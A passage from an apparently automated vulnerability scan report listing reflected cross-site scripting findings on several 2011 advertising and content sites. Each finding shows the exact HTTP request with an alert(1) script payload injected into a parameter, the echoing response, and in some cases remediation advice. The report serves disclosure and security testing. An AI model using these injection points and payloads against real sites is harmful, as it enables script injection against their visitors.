GET /json?c=OXM_274074675974d8c4<script>alert(1)</script>fd80bf050f8&pid=c7be9c39-b00b-4e4a-9ba7-a7008d2ad56b&s=300x250&f=1.19&cid=&url=http%3A%2F%2Fwww.huffingtonpost.com%2F%3Ficid%3Dnavbar_huffpo_main5 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=b884589a-9f2b-4c96-8991-596a4f766c29; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304557173; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_274074675974d8c4<script>alert(1)</script>fd80bf050f8({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAD2OvU7DMBRGT9qkde1AJAod-e3AYok4IU12V
...[SNIP]...

5.58. http://c.aol.com/read/get_topics [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.aol.com
Path:   /read/get_topics

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 68e91<script>alert(1)</script>d00482f33ea was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /read/get_topics?callback=jQuery1509592739215586334_130457509437568e91<script>alert(1)</script>d00482f33ea&channel_id=2&topic_id=19931896&topic_id=19932040&topic_id=19931885&topic_id=19930667&topic_id=19931276&topic_id=19931747&topic_id=19931406&topic_id=19931226&version=1&_=1304575104324 HTTP/1.1
Host: c.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:59:06 GMT
Content-Length: 6439

jQuery1509592739215586334_130457509437568e91<script>alert(1)</script>d00482f33ea({
"topicList" : [ {
"type" : "article",
"createdTime" : "2011-05-05T00:30:13.000+0000",
"ndaysViews" : 0,
"viewCount" : 0,
"title" : "Survey: Most Americans Underestimate Retirem
...[SNIP]...

5.59. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/js/10295-119241-2568-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65460"-alert(1)-"44c1b558e46 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cm/js/10295-119241-2568-4?mpt=59915460965460"-alert(1)-"44c1b558e46&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:40:10 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=59915460965460"-alert(1)-"44c1b558e46&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d
...[SNIP]...

5.60. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/js/10295-119241-2568-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee58"%3balert(1)//1bf6f78cd31 was submitted in the mpvc parameter. This input was echoed as 1ee58";alert(1)//1bf6f78cd31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cm/js/10295-119241-2568-4?mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=1ee58"%3balert(1)//1bf6f78cd31 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:40:22 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=1ee58";alert(1)//1bf6f78cd31http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/
...[SNIP]...

5.61. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 597ce"%3balert(1)//1b506363a98 was submitted in the mpck parameter. This input was echoed as 597ce";alert(1)//1b506363a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609597ce"%3balert(1)//1b506363a98&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:54 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609597ce";alert(1)//1b506363a98&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d
...[SNIP]...

5.62. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ff2"%3balert(1)//a4f03f74c1f was submitted in the mpvc parameter. This input was echoed as 95ff2";alert(1)//a4f03f74c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=95ff2"%3balert(1)//a4f03f74c1f HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:56 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=95ff2";alert(1)//a4f03f74c1fhttp://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/
...[SNIP]...

5.63. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 977b3<script>alert(1)</script>5107276f391 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1977b3<script>alert(1)</script>5107276f391&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4472

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont1977b3<script>alert(1)</script>5107276f391_ib = '<div id="te-clr1-att02cont1977b3<script>
...[SNIP]...

5.64. http://choices.truste.com/ca [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 59666<script>alert(1)</script>9f57f5bbf8 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=25059666<script>alert(1)</script>9f57f5bbf8&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':25059666<script>alert(1)</script>9f57f5bbf8,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1'
...[SNIP]...

5.65. http://choices.truste.com/ca [iplc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 6c672<script>alert(1)</script>96972f9f81a was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr6c672<script>alert(1)</script>96972f9f81a HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr6c672<script>alert(1)</script>96972f9f81a','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://choices.trust
...[SNIP]...

5.66. http://choices.truste.com/ca [ox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 92b40<script>alert(1)</script>42ea5cf0318 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=2092b40<script>alert(1)</script>42ea5cf0318&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':2092b40<script>alert(1)</script>42ea5cf0318,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','notice
...[SNIP]...

5.67. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 9fcac<script>alert(1)</script>5500482d71b was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr9fcac<script>alert(1)</script>5500482d71b&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr9fcac<script>alert(1)</script>5500482d71b','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://
...[SNIP]...

5.68. http://choices.truste.com/ca [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 94668<script>alert(1)</script>e6e4c609a49 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=30094668<script>alert(1)</script>e6e4c609a49&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
